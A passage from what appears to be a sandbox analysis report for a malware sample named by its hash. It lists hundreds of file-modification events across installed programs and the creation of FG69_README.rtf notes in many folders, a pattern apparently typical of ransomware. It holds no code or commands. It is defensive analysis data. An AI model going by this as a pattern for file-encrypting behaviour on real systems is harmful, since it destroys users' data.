Files\Java\jre7\lib\zi\Antarctica\Palmer d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.feature_3.9.0.v20140827-1444\META-INF\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\cs\LC_MESSAGES\vlc.mo d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.feature_3.9.0.v20140827-1444\asl-v20.txt d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-api-annotations-common_ja.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\ko\LC_MESSAGES\vlc.mo d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.http.servlet_1.1.500.v20140318-1755.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\icons\diagnostic-command-16.png d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\configuration\org.eclipse.equinox.simpleconfigurator\bundles.info d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Indiana\Winamac d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-Regular.otf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\pt-BR.pak d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\lib\nbexec64.exe d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Thunder_Bay d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-modules-sendopts.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\VDKHome\VDK10.THD d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Antarctica\Macquarie d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Windows Mail\wab.exe d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\README.txt d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.ssl.feature_1.0.0.v20140827-1444\META-INF\ECLIPSE_.RSA d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\MEIPreload\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.rcp.product_5.5.0.165303\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\unpack200.exe d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\Explorer.zip d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Mozilla Firefox\plugin-container.exe.sig d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Anchorage d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Moncton d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.feature_3.9.0.v20140827-1444\license.html d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.directorywatcher.nl_ja_4.4.0.v20140623020002.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\dark\e4-dark_partstyle.css d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Chita d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\include\win32\bridge\AccessBridgePackages.h d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Maceio d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\DenyExit.wmf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Riyadh89 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\javafx-doclet.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-core.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Costa_Rica d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\Java\jre7\lib\zi\America\North_Dakota\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Kentucky\Louisville d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\bin\java-rmi.exe d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\dropins\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Santiago d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\meta\reader\filename.luac d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\COPYRIGHT d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Africa\Accra d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.transport.ecf.nl_ja_4.4.0.v20140623020002.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.sat4j.pb_2.3.5.v201404071733.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\UnpublishShow.dotm d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateOnDemand.exe d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-jvmstat_zh_CN.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\ext\sunec.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\jps.exe d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.expressions_3.4.600.v20140128-0851.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.launcher.nl_ja_4.4.0.v20140623020002.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.ui.nl_zh_4.4.0.v20140623020002.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-modules-profiler-snaptracer_ja.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\fonts\LucidaBrightItalic.ttf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\intf\modules\httprequests.luac d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\bin\ktab.exe d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\orb.idl d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\modules\sandbox.luac d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Nicosia d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\GMT+8 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\images\cursors\win32_LinkNoDrop32x32.gif d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.help.base_4.0.200.v20141007-2301.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\images\cursors\win32_CopyDrop32x32.gif d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\lib\derbyrun.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\bin\ktab.exe d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Santiago d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\da\LC_MESSAGES\vlc.mo d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.core\cache\binary\com.jrockit.mc.rcp.product_root_5.5.0.165303 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\SystemV\MST7 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.common_2.10.1.v20140901-1043\feature.properties d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.net.nl_ja_4.4.0.v20140623020002.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\XmlFile.zip d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-modules-print.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\fontconfig.bfc d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Multimedia\MPP\Real.mpp d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Manaus d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\winXPBlue.png d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\bn\LC_MESSAGES\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\lv.pak d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\gd\LC_MESSAGES\vlc.mo d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Africa\Algiers d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.extensionlocation.nl_ja_4.4.0.v20140623020002.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.help_2.0.102.v20141007-2301\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Cuiaba d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\accessibility.properties d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\VisualElements\VisualElements_150.png d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\GMT+5 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Pangnirtung d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\as_IN\LC_MESSAGES\vlc.mo d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files (x86)\Google\Update\1.3.35.452\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\default_apps\docs.crx d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\jvm.lib d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\META-INF\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Windows Journal\PDIALOG.exe d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\Microsoft Analysis Services\AS OLEDB\10\Resources\1033\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\Mozilla Firefox\fonts\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\javaw.exe d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\bin\setEmbeddedCP d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Indiana\Vevay d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Microsoft Analysis Services\AS OLEDB\10\Cartridges\as80.xsl d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\default_apps\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\jconsole.exe d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\bin\setNetworkClientCP d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\bin\orbd.exe d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_US_POSIX.txt d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.jface.text.nl_zh_4.4.0.v20140623020002.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.touchpoint.eclipse.nl_ja_4.4.0.v20140623020002.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.diagnostic_5.5.0.165303.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Microsoft Analysis Services\AS OLEDB\10\Resources\1033\msolui100.rll d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\VisualElements\LogoDev.png d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.flightrecorder_5.5.0.165303\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\fy\LC_MESSAGES\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_GB.txt d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1252.TXT d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_ja_4.4.0.v20140623020002\eclipse_update_120.jpg d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-print_ja.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Amsterdam d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\macHandle.png d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Moscow d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\La_Paz d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Galapagos d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.help.webapp_3.6.300.v20140407-1855.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\zh_CN\LC_MESSAGES\vlc.mo d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Boa_Vista d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\it\LC_MESSAGES\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.alert.ja_5.5.0.165303.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-editor-mimelookup-impl_ja.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-jvmstat_ja.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\br.gif d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Port-au-Prince d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-openide-io.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\zh_TW\LC_MESSAGES\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\include\win32\bridge\AccessBridgeCalls.h d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files (x86)\Google\Update\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Yekaterinburg d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.flightrecorder.controlpanel.ui.configuration_5.5.0.165303.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program 